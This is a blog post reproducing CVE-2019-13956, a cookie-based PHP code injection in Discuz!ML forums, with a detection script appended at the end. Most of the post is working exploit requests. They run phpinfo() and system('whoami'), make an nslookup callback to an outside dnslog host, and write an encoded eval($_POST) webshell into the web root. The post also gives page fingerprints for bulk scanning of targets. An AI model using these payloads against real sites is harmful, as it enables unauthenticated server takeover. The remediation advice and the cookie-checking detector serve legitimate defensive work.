[Reproduction] Discuz!ML V3.X Code Injection Vulnerability

Remote code injection vulnerability

Posted by 看不尽的尘埃 on September 19, 2019

Preface

Lately I have been writing fingerprint rules and vulnerability detection and exploitation rules for my company, so reproduction write-ups will be appearing more often.

0x00 Vulnerability overview

  • Name: Discuz!ML V3.X code injection vulnerability
  • CVE: CVE-2019-13956
  • Published: 2019-06-14
  • Description: the value of the language cookie (the cookie whose name ends in _language after the install's random cookie prefix) is taken from the request and spliced, without validation, into generated PHP as part of a single-quoted string literal. A value such as sc'.phpinfo().' closes that literal, appends an arbitrary PHP expression and reopens it, so the expression is evaluated when the generated code is included. No authentication is needed, and the attacker ends up executing arbitrary code as the PHP process user, enough to take over the server.
  • Affected versions: Discuz! ML v.3.4, Discuz! ML v.3.3, Discuz! ML v.3.2
  • Remediation: at the time of writing the vendor had not released a security update; users of this CMS should watch the official site and the code-hosting repository for news. Until a fix is available, validating the cookie value against the installed language codes (short lowercase identifiers such as sc and en) and rejecting anything that contains a quote or a parenthesis blocks this vector.

0x01 Environment setup

First download the source from the official site: http://discuz.ml/download . Unzip it into the WWW directory, start phpStudy and open the URL in a browser; the installer appears. Fill in the database and administrator details correctly and click Next:


After a few seconds the page shows "completed", meaning the installation has finished.

0x02 Reproduction

PoC verification

We can use the phpinfo() output to verify that the vulnerability exists:

GET /discuz/index.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: u7ip_2132_saltkey=E7E88rBR; u7ip_2132_language=sc'.phpinfo().'; u7ip_2132_lastvisit=1568853333; u7ip_2132_sid=eWnKtK; u7ip_2132_sendmail=1; u7ip_2132_lastact=1568857423%09index.php%09


We can also call system() to run an OS command as a check; whoami works on both Windows and Linux:

GET /discuz/index.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: u7ip_2132_saltkey=E7E88rBR; u7ip_2132_lastvisit=1568853333; u7ip_2132_sid=eWnKtK; u7ip_2132_sendmail=1; u7ip_2132_language=sc%27.system('whoami').%27; u7ip_2132_lastact=1568857490%09index.php%09


The whoami output is hard for a scanner to recognise reliably, so a DNSLOG platform makes a better oracle. Since nslookup may be missing on some Linux servers, ping dnslog_server works as well: the DNS query goes out when the name is resolved, before any ICMP packet is sent, so the log entry appears even where ICMP egress is blocked:

GET /discuz/index.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: u7ip_2132_saltkey=E7E88rBR; u7ip_2132_lastvisit=1568853333; u7ip_2132_sid=eWnKtK; u7ip_2132_sendmail=1; u7ip_2132_language=sc%27.system('nslookup 4evdeu.dnslog.cn').%27; u7ip_2132_lastact=1568857490%09index.php%09


Exploitation (EXP)

The vulnerability can also be used to write a webshell; the HTTP request is below. On success the normal page comes back, on failure PHP prints an error. The relative path x.php resolves against the PHP process's working directory, which for the web SAPI is the directory of the executed script, so the shell lands next to index.php in the site root (/discuz/ here); the web-server user needs write permission on that directory for this to work:

GET /discuz/index.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: X9O9_2132_saltkey=seXAWPyb; X9O9_2132_language=sc'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.'; X9O9_2132_lastvisit=1568854995; X9O9_2132_sid=ZUI7iz; X9O9_2132_sendmail=1; sid=abc48gBCCWNz%252FH9NX2yt9UHcyxMQp02Yw80wGxY%252B%252Bqf7oBiEN31WIcrdCg; X9O9_2132_lastact=1568858654%09index.php%09



0x03 Web fingerprint

Bulk scanning needs a fingerprint, naturally!

  • <meta name="generator" content="Discuz! (.*?)" />
  • <meta name="author" content="Discuz!(.*?)" />

0x04 Summary

1. When I first tried to write a PHP webshell through this bug I kept getting errors; in the end I found an EXP that does not error out in an exploit tool on GitHub, https://github.com/theLSA/discuz-ml-rce/blob/master/dz-ml-rce.py. Without it I reckon I would have been stuck for a long time.

2. While writing the rule I ran into the problem of the random cookie prefix, which I solved with a regular expression: [A-Za-z0-9]{4}_[A-Za-z0-9]{4}_language=[A-Za-z]{2}
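The fingerprint regexes from 0x03 and the cookie-prefix regex from 0x04 combined into one detection routine, added here as an example and not part of the original post: it extracts the generator/author meta tags from a page, pulls every *_language cookie out of a raw request regardless of the random prefix, url-decodes the value (the second PoC request sends the quote as %27, so a rule that looks for a literal quote before decoding misses it) and flags any value that is not a bare two-letter code, noting whether it has the quote-dot-call break-out shape. The sample request and page are constructed from the post's own traffic; the two-letter whitelist and the break-out pattern are assumptions of this example.

```python
import re
import urllib.parse

# Fingerprint patterns from 0x03, with straight quotes as the meta tags are written.
GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="Discuz!\s*(.*?)"', re.I)
AUTHOR_RE = re.compile(r'<meta\s+name="author"\s+content="Discuz!(.*?)"', re.I)

# The 0x04 prefix pattern, extended to capture the whole cookie value
# (up to the next ';') instead of only two letters.
LANG_COOKIE_RE = re.compile(
    r"(?<![A-Za-z0-9_])([A-Za-z0-9]{4}_[A-Za-z0-9]{4}_)language=([^;]*)")
# Benign values: a bare language code such as sc, tc, en (assumed whitelist).
SAFE_LANG_RE = re.compile(r"^[A-Za-z]{2}$")
# The break-out shape used by every payload in the post: quote, dot, function call.
BREAKOUT_RE = re.compile(r"'\s*\.\s*[A-Za-z_]\w*\s*\(")


def fingerprint(html):
    # (generator, author) from the Discuz! meta tags, or None when neither is present.
    gen = GENERATOR_RE.search(html)
    author = AUTHOR_RE.search(html)
    if not gen and not author:
        return None
    return (gen.group(1).strip() if gen else "",
            author.group(1).strip() if author else "")


def language_cookies(cookie_header):
    # Every (prefix, decoded value) pair for *_language cookies in a Cookie header.
    return [(m.group(1), urllib.parse.unquote(m.group(2).strip()))
            for m in LANG_COOKIE_RE.finditer(cookie_header)]


def classify_cookie(cookie_header):
    # Findings as (prefix, decoded value, has_breakout_shape); empty when clean.
    # Decoding first matters: sc%27.system(...) carries no literal quote.
    findings = []
    for prefix, value in language_cookies(cookie_header):
        if not SAFE_LANG_RE.match(value):
            findings.append((prefix, value, bool(BREAKOUT_RE.search(value))))
    return findings


def cookie_header_of(raw_request):
    # Pull the Cookie header value out of a raw HTTP request text.
    for line in raw_request.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "cookie":
            return value.strip()
    return ""


def scan_request(raw_request):
    return classify_cookie(cookie_header_of(raw_request))


# Constructed sample traffic, modelled on the post's requests and a generic Discuz! page.
CLEAN_COOKIE = ("u7ip_2132_saltkey=E7E88rBR; u7ip_2132_language=sc; "
                "u7ip_2132_lastvisit=1568853333; u7ip_2132_sid=eWnKtK")
WHOAMI_REQUEST = (
    "GET /discuz/index.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Cookie: u7ip_2132_saltkey=E7E88rBR; u7ip_2132_sendmail=1; "
    "u7ip_2132_language=sc%27.system('whoami').%27; "
    "u7ip_2132_lastact=1568857490%09index.php%09\r\n"
    "\r\n")
SAMPLE_PAGE = ('<html><head><meta name="generator" content="Discuz! X3.4" />'
               '<meta name="author" content="Discuz! Team and Comsenz UI Team" />'
               '</head></html>')

if __name__ == "__main__":
    print("fingerprint:", fingerprint(SAMPLE_PAGE))
    print("clean cookie:", classify_cookie(CLEAN_COOKIE))
    print("whoami request:", scan_request(WHOAMI_REQUEST))
```

A lone stray quote (decoded value sc') fails the whitelist but not the break-out pattern, so the third field lets a rule separate a malformed cookie from an actual injection attempt; the whitelist alone is what blocks the attack, the pattern only ranks severity.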